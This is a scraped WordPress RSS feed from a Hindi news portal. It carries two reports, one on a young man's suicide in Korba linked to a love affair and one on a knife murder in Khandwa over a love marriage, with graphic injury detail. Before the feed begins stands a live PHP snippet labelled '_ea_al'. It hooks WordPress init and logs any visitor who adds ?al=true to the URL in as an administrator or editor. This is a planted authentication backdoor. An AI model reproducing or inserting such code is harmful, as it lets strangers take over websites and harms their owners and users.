// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); love affair – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Sun, 22 Sep 2024 12:45:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 छत्तीसगढ़-कोरबा में युवक ने फांसी लगा कर दी जान, प्रेम प्रसंग के चलते उठाया कदम https://pratyushaashakinayikiran.com/?p=73511 Sun, 22 Sep 2024 12:45:00 +0000 https://pratyushaashakinayikiran.com/?p=73511 कोरबा.

कोरबा के पुष्पराजगढ़ निवासी एक जायसवाल युवक ने फांसी लगाकर खुदकुशी कर ली। इस घटना के बाद हड़कंप मच गया इसकी सूचना पुलिस को दी गई जहां जांच अभी भी जारी है। मौत का सीसीटीवी फुटेज सामने है वही मृतक के पास से सुसाइड नोट भी बरामद किया गया है। वीडियो अब सोशल मीडिया में वायरल हो रहा है।

बताया जा रहा है एक सप्ताह पहले मामला पाली थाना क्षेत्र के परसदा गांव में सामने आया है जानकारी के मुताबिक, मध्यप्रदेश के अनूपपुर जिले के पुष्पराजगढ़ स्थित मौहारी निवासी शिवम जायसवाल 26 वर्षीय पाली के परसदा गांव में मामा के घर रहता था। कुछ साल पहले रोजगार की तलाश में छत्तीसगढ़ आया था। जहां कोरबा के परसदा में अपने मामा के यहां रहने लगा। अपने मामा का हार्डवेयर की दुकान है जिसे देख देख करने लगा और व्यवसाय में अपने मामा का साथ दे रहा था। बताया जा रहा है कि परसदा गांव के ही किसी लड़की के साथ उसका प्रेम प्रसंग चल रहा था। धीरे-धीरे दोनों के बीच नजदीकियां बढ़ने लगीं और वे एक-दूसरे से मिलने लगे। दोनों एक दूसरे को पिछले डेढ साल से प्यार कर रहे थे। दोनों के परिवार को इसकी जानकारी भी थी। शिवम ने अपने परिजन से शादी करने की बात भी कही थी। लेकिन उन्होंने अभी घर में बड़े भाई-बहन होने का हवाला दिया शादी करने से इनकार कर दिया जिसके बाद अपनी प्रेमिका को लेकर शिवम कुछ समय से परेशान रहता था। मिलना जुलना काम हो गया और मोबाइल पर ही बातचीत कर रहे थे। बताया जा रहा कि शिवम के परिजनों का आरोप है कि, उसके प्रेमिका के परिवार वाले शिवम को दूर रहने की धमकी देते थे। जिससे वो परेशान था। जबकि दोनों ने कहीं शादी भी कर ली थी। मांग में सिंदूर भरी एक तस्वीर भी परिजनों को मिली है। शिवम ने घटना दिनांक को रात के वक्त अपने कमरे में खा पीकर सोने के लिए गया इसके बाद हो फोन से बात कर रहा था दरवाजा खोलकर अंदर घुसा और फांसी के फंदे पर झूल गया वही कमरे के बरामदे में लगे सीसीटीवी में फासी का वीडियो कैद हो गया और वह सोशल मीडिया में वायरल हो रहा है। बताया जा रहा है कि शिवम ने एक सुसाइड नोट भी लिखा है, जिसमें खुद की मर्जी से खुदकुशी करने की बात लिखी है। लेकिन परिजनों ने आशंका जताई है कि किसी के दबाव में आकर उसने सुसाइड नोट लिखा है। वो काफी होनहार लड़का था, बिना किसी दबाव के ऐसा कर ही नहीं सकता है। इस मामले के विवेचक और पानी थाने के प्रधान आरक्षक शिवराज सिंह राजपूत का कहना है कि, प्रेम-प्रसंग में सुसाइड की बात सामने आई है। उसके साथ मौजूद दोस्त से पूछताछ की गई है। परिजन अंतिम संस्कार के कार्यक्रम में व्यस्थ थे। अब आकर शिकायत करेंगे, तो आगे कार्रवाई की जाएगी। लड़की का नाम आया है, उससे भी पूछताछ की जाएगी। फिलहाल मामले की जांच जारी है।

]]>
खंडवा में प्रेम प्रसंग के चलते एक युवक की बेरहमी से हत्या करने का मामला सामने आया https://pratyushaashakinayikiran.com/?p=64120 Fri, 30 Aug 2024 15:16:00 +0000 https://pratyushaashakinayikiran.com/?p=64120  खंडवा
 खंडवा में प्रेम प्रसंग के चलते एक युवक की बेरहमी से हत्या करने का मामला सामने आया है। हत्यारे ने युवक के पेट में चाकू से ताबड़तोड़ कई वार कर उसे मौत के घाट उतार दिया। हत्या के समय युवक घर में अकेला था। मृतक की भाभी की तबियत खराब होने के चलते परिजन जिला अस्पताल में गए हुए थे।

जानकारी के अनुसार, मृतक युवक ने एक साल पहले गांव की ही एक लड़की से प्रेम विवाह किया था। इसके बाद से युवती का परिवार उससे नाराज था। इसी के चलते युवती के भाई ने परिवार के अपमान का बदला लेने युवक को मौत के घाट उतार दिया। मृतक के परिजनों ने युवती के भाई सहित उसके परिवार के तीन लोगों पर हत्या का आरोप लगाया है। घटना कोतवाली थाना क्षेत्र के ग्राम जामली की है। घटना की सूचना मिलते ही पुलिस भी मौके पर पहुंच गई। बताया जा रहा है कि हत्या करने वाला आरोपी नाबालिग है, जो हत्या के बाद से फरार है। फिलहाल पुलिस उसकी तलाश कर रही है।

खंडवा के कोतवाली थाना क्षेत्र के जमली गांव में गुरुवार को रात युवक तीरथ पिता गेंदालाल सांवनेर की हत्या कर दी गई। उसका शव सड़क पर ओंधे मुंह पड़ा हुआ था। ग्रामीणों की सूचना पर कोतवाली ​थाना प्रभारी निरीक्षक अशोक चौहान पुलिसकर्मियों के साथ घटनास्थल पहुंचे। युवक के पेट पर चाकू से कई वार किए गए थे। हत्यारे ने युवक के पेट पर इतनी बेरहमी से वार किए थे कि पेट की आंतें तक बाहर आ गई थीं। कोतवाली टीआई को लोगों ने युवक के बारे में जानकारी दी। एफएसएल टीम ने भी घटनास्थल पर जाकर मुआयना किया। इसके बाद शव को पोस्टमॉर्टम के लिए जिला अस्पताल भेज दिया गया।

इधर तीरथ की हत्या को लेकर उसके बड़े भाई ने बताया कि तीरथ और आरोपी की बहन के बीच में प्रेम प्रसंग था। कुछ समय पहले तीरथ उसकी बहन को लेकर चला गया था। दोनों ने शादी कर ली ​थी, लेकिन लड़की के नाबालिग होने से पुलिस ने उसे बरामद कर उसके परिवार को सौंप दिया था। उसके बाद से आरोपी और उसका परिवार तीरथ से रंजिश रखने लगा था और उसे जान से मारने की धमकी दी थी। आज सभी लोग जिला अस्पताल में थे और घर पर तीरथ अकेला था। इस मौके का फायदा उठाकर आरोपी और उसके परिवार के तीन लोगों ने मेरे भाई तीरथ की हत्या कर दी।

वहीं खंडवा डीएसपी हेड क्वार्टर अनिल सिंह चौहान ने बताया कि जमली कला गांव में तीरथ नाम के युवक की हत्या हुई है। यह सूचना पुलिस को मिली जिस पर पुलिस मौके पर पहुंची। फिलहाल शव को अस्पताल की मोर्चरी में रखवा दिया गया है। पुलिस इस मामले में जांच कर रही है। फिलहाल प्रारंभिक जांच में पता चला है कि आरोपी के परिवार की किसी लड़की को मृतक एक साल पहले घर से भगा कर ले गया था। उसी रंजिश के चलते यह हत्या हुई है।

]]>